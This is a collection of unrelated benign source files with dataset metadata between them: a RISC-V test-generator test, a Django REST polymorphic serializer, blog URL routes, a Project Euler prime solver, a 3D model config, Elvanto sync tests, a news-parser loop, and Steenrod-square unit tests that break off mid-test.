# making changes to entities represented by StateElements that have already
# been processed. Changes to entities represented by StateElements that
# will be processed later are permitted.
#
# @param aStateElem A StateElement object.
def processStateElement(self, aStateElem):
processed = False
# Randomly decide whether to process the StateElement or defer to the
# default implementation
if RandomUtils.random32(0, 1) == 1:
(mem_block_ptr_index,) = self.getArbitraryGprs(1, aExclude=(0,))
self.initializeMemoryBlock(mem_block_ptr_index, (aStateElem,))
self.genInstruction(
"FLD##RISCV",
{
"rd": aStateElem.getRegisterIndex(),
"rs1": mem_block_ptr_index,
"simm12": 0,
"NoRestriction": 1,
},
)
processed = True
return processed
# This test verifies that a StateTransition handler can process some of the
# StateElements and defer to the default StateTransitionHandler for the
# remaining StateElements.
class MainSequence(Sequence):
def __init__(self, aGenThread, aName=None):
super().__init__(aGenThread, aName)
self._mExpectedStateData = {}
def generate(self, **kargs):
state_trans_handler = PartialStateTransitionHandlerTest(self.genThread)
StateTransition.registerStateTransitionHandler(
state_trans_handler,
EStateTransitionType.Explicit,
(EStateElementType.FloatingPointRegister,),
)
test_utils = state_transition_test_utils
state = self._createState()
StateTransition.transitionToState(state)
test_utils.verify_state(self, self._mExpectedStateData)
# Create a simple State to test an explicit StateTransition.
def _createState(self):
state = State()
test_utils = state_transition_test_utils
self._mExpectedStateData[
EStateElementType.FloatingPointRegister
] = test_utils.add_random_floating_point_register_state_elements(
self, state, RandomUtils.random32(0, 15)
)
return state
MainSequenceClass = MainSequence
GenThreadClass = GenThreadRISCV
EnvClass = EnvRISCV | en | 0.835595 | # # Copyright (C) [2020] Futurewei Technologies, Inc. # # FORCE-RISCV is licensed under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES # OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO # NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. # See the License for the specific language governing permissions and # limitations under the License. # # A test StateTransitionHandler that defers to the default # StateTransitionHandler some of the time. # Execute the State change represented by the StateElement. Only instances # of the StateElement types for which the StateTransitionHandler has been # registered will be passed to this method. Other StateTransitionHandlers # will process the other StateElement types. It is important to avoid # making changes to entities represented by StateElements that have already # been processed. Changes to entities represented by StateElements that # will be processed later are permitted. # # @param aStateElem A StateElement object. # Randomly decide whether to process the StateElement or defer to the # default implementation ##RISCV", # This test verifies that a StateTransition handler can process some of the # StateElements and defer to the default StateTransitionHandler for the # remaining StateElements. # Create a simple State to test an explicit StateTransition. | 1.94623 | 2 |
polymorphic/serializers.py | wlongo/django-polymorphic | 0 | 6612433 | from collections.abc import Mapping
from six import string_types
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from rest_framework import serializers
from rest_framework.fields import empty
# NOTES: Code extracted from the project django-rest-polymorphic ! ( https://github.com/apirobot/django-rest-polymorphic )
class PolymorphicSerializer( serializers.Serializer ):
model_serializer_mapping = None
resource_type_field_name = 'resourcetype'
def __new__( cls, *args, **kwargs ):
if cls.model_serializer_mapping is None:
raise ImproperlyConfigured(
'`{cls}` is missing a '
'`{cls}.model_serializer_mapping` attribute'.format(
cls = cls.__name__
)
)
if not isinstance( cls.resource_type_field_name, string_types ):
raise ImproperlyConfigured(
'`{cls}.resource_type_field_name` must be a string'.format(
cls = cls.__name__
)
)
return super().__new__( cls, *args, **kwargs )
def __init__( self, *args, **kwargs ):
super().__init__( *args, **kwargs )
model_serializer_mapping = self.model_serializer_mapping
self.model_serializer_mapping = { }
self.resource_type_model_mapping = { }
for model, serializer in model_serializer_mapping.items():
resource_type = self.to_resource_type( model )
if callable( serializer ):
serializer = serializer( *args, **kwargs )
serializer.parent = self
self.resource_type_model_mapping[resource_type] = model
self.model_serializer_mapping[model] = serializer
# ----------
# Public API
def to_resource_type( self, model_or_instance ):
return model_or_instance._meta.object_name
def to_representation( self, instance ):
if isinstance( instance, Mapping ):
resource_type = self._get_resource_type_from_mapping( instance )
serializer = self._get_serializer_from_resource_type( resource_type )
else:
resource_type = self.to_resource_type( instance )
serializer = self._get_serializer_from_model_or_instance( instance )
ret = serializer.to_representation( instance )
ret[self.resource_type_field_name] = resource_type
return ret
def to_internal_value( self, data ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
ret = serializer.to_internal_value( data )
ret[self.resource_type_field_name] = resource_type
return ret
def create( self, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.create( validated_data )
def update( self, instance, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.update( instance, validated_data )
def is_valid( self, *args, **kwargs ):
valid = super().is_valid( *args, **kwargs )
try:
resource_type = self._get_resource_type_from_mapping( self.validated_data )
serializer = self._get_serializer_from_resource_type( resource_type )
except serializers.ValidationError:
child_valid = False
else:
child_valid = serializer.is_valid( *args, **kwargs )
self._errors.update( serializer.errors )
return valid and child_valid
def run_validation( self, data = empty ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
validated_data = serializer.run_validation( data )
validated_data[self.resource_type_field_name] = resource_type
return validated_data
# --------------
# Implementation
def _to_model( self, model_or_instance ):
return (model_or_instance.__class__
if isinstance( model_or_instance, models.Model )
else model_or_instance)
def _get_resource_type_from_mapping( self, mapping ):
try:
return mapping[self.resource_type_field_name]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'This field is required',
} )
def _get_serializer_from_model_or_instance( self, model_or_instance ):
model = self._to_model( model_or_instance )
for klass in model.mro():
if klass in self.model_serializer_mapping:
return self.model_serializer_mapping[klass]
raise KeyError(
'`{cls}.model_serializer_mapping` is missing '
'a corresponding serializer for `{model}` model'.format(
cls = self.__class__.__name__,
model = model.__name__
)
)
def _get_serializer_from_resource_type( self, resource_type ):
try:
model = self.resource_type_model_mapping[resource_type]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'Invalid {0}'.format(
self.resource_type_field_name
)
} )
return self._get_serializer_from_model_or_instance( model )
class Meta:
pass
| from collections.abc import Mapping
from six import string_types
from django.core.exceptions import ImproperlyConfigured
from django.db import models
from rest_framework import serializers
from rest_framework.fields import empty
# NOTES: Code extracted from the project django-rest-polymorphic ! ( https://github.com/apirobot/django-rest-polymorphic )
class PolymorphicSerializer( serializers.Serializer ):
model_serializer_mapping = None
resource_type_field_name = 'resourcetype'
def __new__( cls, *args, **kwargs ):
if cls.model_serializer_mapping is None:
raise ImproperlyConfigured(
'`{cls}` is missing a '
'`{cls}.model_serializer_mapping` attribute'.format(
cls = cls.__name__
)
)
if not isinstance( cls.resource_type_field_name, string_types ):
raise ImproperlyConfigured(
'`{cls}.resource_type_field_name` must be a string'.format(
cls = cls.__name__
)
)
return super().__new__( cls, *args, **kwargs )
def __init__( self, *args, **kwargs ):
super().__init__( *args, **kwargs )
model_serializer_mapping = self.model_serializer_mapping
self.model_serializer_mapping = { }
self.resource_type_model_mapping = { }
for model, serializer in model_serializer_mapping.items():
resource_type = self.to_resource_type( model )
if callable( serializer ):
serializer = serializer( *args, **kwargs )
serializer.parent = self
self.resource_type_model_mapping[resource_type] = model
self.model_serializer_mapping[model] = serializer
# ----------
# Public API
def to_resource_type( self, model_or_instance ):
return model_or_instance._meta.object_name
def to_representation( self, instance ):
if isinstance( instance, Mapping ):
resource_type = self._get_resource_type_from_mapping( instance )
serializer = self._get_serializer_from_resource_type( resource_type )
else:
resource_type = self.to_resource_type( instance )
serializer = self._get_serializer_from_model_or_instance( instance )
ret = serializer.to_representation( instance )
ret[self.resource_type_field_name] = resource_type
return ret
def to_internal_value( self, data ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
ret = serializer.to_internal_value( data )
ret[self.resource_type_field_name] = resource_type
return ret
def create( self, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.create( validated_data )
def update( self, instance, validated_data ):
resource_type = validated_data.pop( self.resource_type_field_name )
serializer = self._get_serializer_from_resource_type( resource_type )
return serializer.update( instance, validated_data )
def is_valid( self, *args, **kwargs ):
valid = super().is_valid( *args, **kwargs )
try:
resource_type = self._get_resource_type_from_mapping( self.validated_data )
serializer = self._get_serializer_from_resource_type( resource_type )
except serializers.ValidationError:
child_valid = False
else:
child_valid = serializer.is_valid( *args, **kwargs )
self._errors.update( serializer.errors )
return valid and child_valid
def run_validation( self, data = empty ):
resource_type = self._get_resource_type_from_mapping( data )
serializer = self._get_serializer_from_resource_type( resource_type )
validated_data = serializer.run_validation( data )
validated_data[self.resource_type_field_name] = resource_type
return validated_data
# --------------
# Implementation
def _to_model( self, model_or_instance ):
return (model_or_instance.__class__
if isinstance( model_or_instance, models.Model )
else model_or_instance)
def _get_resource_type_from_mapping( self, mapping ):
try:
return mapping[self.resource_type_field_name]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'This field is required',
} )
def _get_serializer_from_model_or_instance( self, model_or_instance ):
model = self._to_model( model_or_instance )
for klass in model.mro():
if klass in self.model_serializer_mapping:
return self.model_serializer_mapping[klass]
raise KeyError(
'`{cls}.model_serializer_mapping` is missing '
'a corresponding serializer for `{model}` model'.format(
cls = self.__class__.__name__,
model = model.__name__
)
)
def _get_serializer_from_resource_type( self, resource_type ):
try:
model = self.resource_type_model_mapping[resource_type]
except KeyError:
raise serializers.ValidationError( {
self.resource_type_field_name: 'Invalid {0}'.format(
self.resource_type_field_name
)
} )
return self._get_serializer_from_model_or_instance( model )
class Meta:
pass
| en | 0.578828 | # NOTES: Code extracted from the project django-rest-polymorphic ! ( https://github.com/apirobot/django-rest-polymorphic ) # ---------- # Public API # -------------- # Implementation | 2.012013 | 2 |
ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/anonymization/data/classes_and_methods/in_1_basic.py | JetBrains-Research/ast-transformations | 8 | 6612434 | <filename>ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/anonymization/data/classes_and_methods/in_1_basic.py<gh_stars>1-10
class C:
def __init__(self):
pass
def foo(self, foo, bar):
print(foo, bar, self)
def bar(self):
pass
@classmethod
def class_baz(cls, x):
pass
@staticmethod
def static_yep(a, b, c):
pass | <filename>ast-transformations-core/src/test/resources/org/jetbrains/research/ml/ast/transformations/anonymization/data/classes_and_methods/in_1_basic.py<gh_stars>1-10
class C:
def __init__(self):
pass
def foo(self, foo, bar):
print(foo, bar, self)
def bar(self):
pass
@classmethod
def class_baz(cls, x):
pass
@staticmethod
def static_yep(a, b, c):
pass | none | 1 | 2.413576 | 2 | |
blog/urls.py | mfarjami/Django-project-blog | 1 | 6612435 | from django.urls import path, re_path
from .views import *
app_name = 'blog'
urlpatterns = [
path('', ArticleList.as_view(), name='home'),
path('all/', ArticleAllList.as_view(), name='all-posts'),
# path('all/page/<int:page>', ArticleList.as_view(), name='home'),
path('article/<slug:slug>', ArticleDetail.as_view(), name='detail'),
path('preview/<int:pk>', ArticlePreview.as_view(), name='preview'),
path('category/<slug:slug>/', CategoryList.as_view(), name='category'),
path('author/<slug:username>/', AuthorList.as_view(), name='author'),
path('search/', SearchList.as_view(), name='search'),
] | from django.urls import path, re_path
from .views import *
app_name = 'blog'
urlpatterns = [
path('', ArticleList.as_view(), name='home'),
path('all/', ArticleAllList.as_view(), name='all-posts'),
# path('all/page/<int:page>', ArticleList.as_view(), name='home'),
path('article/<slug:slug>', ArticleDetail.as_view(), name='detail'),
path('preview/<int:pk>', ArticlePreview.as_view(), name='preview'),
path('category/<slug:slug>/', CategoryList.as_view(), name='category'),
path('author/<slug:username>/', AuthorList.as_view(), name='author'),
path('search/', SearchList.as_view(), name='search'),
] | en | 0.130941 | # path('all/page/<int:page>', ArticleList.as_view(), name='home'), | 2.104348 | 2 |
p007.py | anadahalli/project-euler | 1 | 6612436 | <gh_stars>1-10
"""Problem 007
By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that
the 6th prime is 13.
What is the 10 001st prime number?
"""
from math import sqrt
is_prime = lambda n: not any([n % i == 0 for i in range(2, int(sqrt(n))+1)])
def nth_prime(n):
count = 0
prime = 2
while True:
if is_prime(prime):
count += 1
if count == n:
return prime
prime += 1
ans = nth_prime(10001)
print(ans)
| """Problem 007
By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that
the 6th prime is 13.
What is the 10 001st prime number?
"""
from math import sqrt
is_prime = lambda n: not any([n % i == 0 for i in range(2, int(sqrt(n))+1)])
def nth_prime(n):
count = 0
prime = 2
while True:
if is_prime(prime):
count += 1
if count == n:
return prime
prime += 1
ans = nth_prime(10001)
print(ans) | en | 0.955163 | Problem 007 By listing the first six prime numbers: 2, 3, 5, 7, 11, and 13, we can see that the 6th prime is 13. What is the 10 001st prime number? | 3.952994 | 4 |
configs/_base_/models/dgcnn.py | maskjp/mmdetection3d | 5 | 6612437 | # model settings
model = dict(
type='EncoderDecoder3D',
backbone=dict(
type='DGCNNBackbone',
in_channels=9, # [xyz, rgb, normal_xyz], modified with dataset
num_samples=(20, 20, 20),
knn_modes=('D-KNN', 'F-KNN', 'F-KNN'),
radius=(None, None, None),
gf_channels=((64, 64), (64, 64), (64, )),
fa_channels=(1024, ),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2)),
decode_head=dict(
type='DGCNNHead',
fp_channels=(1216, 512),
channels=256,
dropout_ratio=0.5,
conv_cfg=dict(type='Conv1d'),
norm_cfg=dict(type='BN1d'),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2),
loss_decode=dict(
type='CrossEntropyLoss',
use_sigmoid=False,
class_weight=None, # modified with dataset
loss_weight=1.0)),
# model training and testing settings
train_cfg=dict(),
test_cfg=dict(mode='slide'))
| # model settings
model = dict(
type='EncoderDecoder3D',
backbone=dict(
type='DGCNNBackbone',
in_channels=9, # [xyz, rgb, normal_xyz], modified with dataset
num_samples=(20, 20, 20),
knn_modes=('D-KNN', 'F-KNN', 'F-KNN'),
radius=(None, None, None),
gf_channels=((64, 64), (64, 64), (64, )),
fa_channels=(1024, ),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2)),
decode_head=dict(
type='DGCNNHead',
fp_channels=(1216, 512),
channels=256,
dropout_ratio=0.5,
conv_cfg=dict(type='Conv1d'),
norm_cfg=dict(type='BN1d'),
act_cfg=dict(type='LeakyReLU', negative_slope=0.2),
loss_decode=dict(
type='CrossEntropyLoss',
use_sigmoid=False,
class_weight=None, # modified with dataset
loss_weight=1.0)),
# model training and testing settings
train_cfg=dict(),
test_cfg=dict(mode='slide'))
| en | 0.794165 | # model settings # [xyz, rgb, normal_xyz], modified with dataset # modified with dataset # model training and testing settings | 1.820503 | 2 |
elvanto_sync/tests/test_elvanto.py | monty5811/elvanto_mail_sync | 4 | 6612438 | import pytest
import vcr
from django.core.management import call_command
from elvanto_sync import elvanto
from elvanto_sync.models import ElvantoGroup, ElvantoPerson
from elvanto_sync.tests.conftest import elvanto_vcr
@pytest.mark.django_db
class TestElvanto():
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_groups()
grp = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
assert str(grp) == 'All'
@elvanto_vcr
def test_pull_people(self):
elvanto.pull_people()
calvin = ElvantoPerson.objects.get(e_id='f7cfa258-d3c6-11e4-95ba-068b656294b7')
assert str(calvin) == '<NAME>'
assert calvin.email == '<EMAIL>'
chalmers = ElvantoPerson.objects.get(e_id='5a0a1cbc-d3c7-11e4-95ba-068b656294b7')
assert str(chalmers) == '<NAME>'
assert chalmers.email == '<EMAIL>'
knox = ElvantoPerson.objects.get(e_id='c1136264-d3c7-11e4-95ba-068b656294b7')
assert str(knox) == '<NAME>'
assert knox.email == ''
owen = ElvantoPerson.objects.get(e_id='48366137-d3c7-11e4-95ba-068b656294b7')
assert str(owen) == '<NAME>'
assert owen.email == '<EMAIL>'
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_people()
elvanto.pull_groups()
assert ElvantoGroup.objects.count() == 5
grp_all = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
e_emails = grp_all.elvanto_emails()
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert grp_all.group_members.count() == 3
@elvanto_vcr
def test_refresh_data(self):
elvanto.refresh_elvanto_data()
@elvanto_vcr
def test_refresh_pull_management_command(self):
call_command('pull_from_elvanto')
@elvanto_vcr
def test_delete_old_groups(self):
elvanto.refresh_elvanto_data()
assert ElvantoGroup.objects.count() == 5
assert ElvantoPerson.objects.count() == 11
# construct synthetic elvanto data:
data = {
'groups': {
'group': [{
'id': '7ebd2605-d3c7-11e4-95ba-068b656294b7',
}]
}
}
elvanto.delete_missing_groups(data)
# check:
assert ElvantoGroup.objects.count() == 1
assert ElvantoPerson.objects.count() == 11
| import pytest
import vcr
from django.core.management import call_command
from elvanto_sync import elvanto
from elvanto_sync.models import ElvantoGroup, ElvantoPerson
from elvanto_sync.tests.conftest import elvanto_vcr
@pytest.mark.django_db
class TestElvanto():
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_groups()
grp = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
assert str(grp) == 'All'
@elvanto_vcr
def test_pull_people(self):
elvanto.pull_people()
calvin = ElvantoPerson.objects.get(e_id='f7cfa258-d3c6-11e4-95ba-068b656294b7')
assert str(calvin) == '<NAME>'
assert calvin.email == '<EMAIL>'
chalmers = ElvantoPerson.objects.get(e_id='5a0a1cbc-d3c7-11e4-95ba-068b656294b7')
assert str(chalmers) == '<NAME>'
assert chalmers.email == '<EMAIL>'
knox = ElvantoPerson.objects.get(e_id='c1136264-d3c7-11e4-95ba-068b656294b7')
assert str(knox) == '<NAME>'
assert knox.email == ''
owen = ElvantoPerson.objects.get(e_id='48366137-d3c7-11e4-95ba-068b656294b7')
assert str(owen) == '<NAME>'
assert owen.email == '<EMAIL>'
@elvanto_vcr
def test_pull_groups(self):
elvanto.pull_people()
elvanto.pull_groups()
assert ElvantoGroup.objects.count() == 5
grp_all = ElvantoGroup.objects.get(e_id='7ebd2605-d3c7-11e4-95ba-068b656294b7')
e_emails = grp_all.elvanto_emails()
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert '<EMAIL>' in e_emails
assert grp_all.group_members.count() == 3
@elvanto_vcr
def test_refresh_data(self):
elvanto.refresh_elvanto_data()
@elvanto_vcr
def test_refresh_pull_management_command(self):
call_command('pull_from_elvanto')
@elvanto_vcr
def test_delete_old_groups(self):
elvanto.refresh_elvanto_data()
assert ElvantoGroup.objects.count() == 5
assert ElvantoPerson.objects.count() == 11
# construct synthetic elvanto data:
data = {
'groups': {
'group': [{
'id': '7ebd2605-d3c7-11e4-95ba-068b656294b7',
}]
}
}
elvanto.delete_missing_groups(data)
# check:
assert ElvantoGroup.objects.count() == 1
assert ElvantoPerson.objects.count() == 11
| en | 0.511941 | # construct synthetic elvanto data: # check: | 2.035951 | 2 |
main.py | nikben08/news_parser | 0 | 6612439 | import rusbase_parser
import neurohive_parser
import ai_news_parser
import hi_news_parser
import vc_parser
import time
while True: # Цикл который по очереди запускает каждый парсер
rusbase_parser.rusbase_parser()
neurohive_parser.neurohive_parser()
ai_news_parser.ai_news_parser()
hi_news_parser.hi_news_parser()
vc_parser.vc_parser()
time.sleep(1800)
| import rusbase_parser
import neurohive_parser
import ai_news_parser
import hi_news_parser
import vc_parser
import time
while True: # Цикл который по очереди запускает каждый парсер
rusbase_parser.rusbase_parser()
neurohive_parser.neurohive_parser()
ai_news_parser.ai_news_parser()
hi_news_parser.hi_news_parser()
vc_parser.vc_parser()
time.sleep(1800)
| ru | 0.999116 | # Цикл который по очереди запускает каждый парсер | 1.47633 | 1 |
ksb_homology/Ssquares/test_squares.py | Edoldin/KSB_homology | 0 | 6612440 | import sys, os
ksb_homology_path_list=os.path.dirname(os.path.realpath(__file__)).split("\\")[0:-2]
ksb_homology_path= "\\".join(ksb_homology_path_list)
if ksb_homology_path not in sys.path:
sys.path.append(ksb_homology_path)
import unittest
from ksb_homology.Ssquares import Ssquares
class SsquaresTest(unittest.TestCase):
def setUpIncreaseValues(top,bot):
uddot=sorted(set(top).difference(set(bot)))
n=len(uddot)
parallel=[[]]
remain=[[]]
circ=[uddot]
for l in range(1,n):
parallel.append(circ[0][0:l])
circ.append(circ[0][l:n])
remain.append([])
return [parallel,circ,remain]
def test_calculate_index(self):
return 1
'''def test_kth_steenrod_square(self):
X=BS.proyective_2planes_product_element()
S=((),(1))
sol=kth_steenrod_square( 2, X, S)
self.assertEqual(kth_steenrod_square( 2, X, S), ((0,1),(1)) )'''
def test_increase1(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[],[0],[0,1],[0,1,3]])
self.assertEqual(circ,[[0,1,2,3],[1,2,3],[2,3],[2]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase2(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [2]])
self.assertEqual(remain,[[],[],[],[3]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase3(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,1], [0,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [2,3], [3]])
self.assertEqual(remain,[[],[],[],[2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_increase4(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,1]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [3]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1) #algorithm sais 1
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
def test_increase5(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2,3],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain)
self.assertEqual(parallel,[[], [0], [0,2], [0,2,3]])
self.assertEqual(circ,[[0,1,2,3], [1,2,3], [1,3], [1]])
self.assertEqual(remain,[[],[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 3)
self.assertEqual(stop, False)
def test_complete_increase(self):
parallel, circ, remain = SsquaresTest.setUpIncreaseValues([0,1,2],[])
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #1
self.assertEqual(parallel,[[],[0],[0,2]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #2
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[1]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #3
self.assertEqual(parallel,[[],[0],[0]])
self.assertEqual(circ,[[0,1,2],[1,2],[2]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #4
self.assertEqual(parallel,[[],[1],[1,0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #5
self.assertEqual(parallel,[[],[1],[1,2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #6
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
self.assertEqual(remain,[[],[],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #7
self.assertEqual(parallel,[[],[1],[1]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #8
self.assertEqual(parallel,[[],[2],[2,0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #9
self.assertEqual(parallel,[[],[2],[2,1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #10
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #11
self.assertEqual(parallel,[[],[2],[2]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[],[0]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #12
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 2)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #13
self.assertEqual(parallel,[[],[],[1]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 1)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #14
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[0]])
self.assertEqual(remain,[[],[2],[1, 2]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 2)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #15
self.assertEqual(parallel,[[],[],[]])
self.assertEqual(circ,[[0,1,2],[0,1],[1]])
self.assertEqual(remain,[[],[2],[0,2]])
self.assertEqual(pivot, 0)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 2)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #16
self.assertEqual(parallel,[[],[],[0]])
self.assertEqual(circ,[[0,1,2],[0,2],[2]])
self.assertEqual(remain,[[],[1],[1]])
self.assertEqual(pivot, 1)
self.assertEqual(parpivot, 3)
self.assertEqual(level, 1)
self.assertEqual(stop, False)
pivot, parpivot, level, stop = Ssquares.increase(parallel, circ, remain) #17
self.assertEqual(parallel,[[],[],[2]])
self.assertEqual(circ,[[0,1,2],[0,2],[0]])
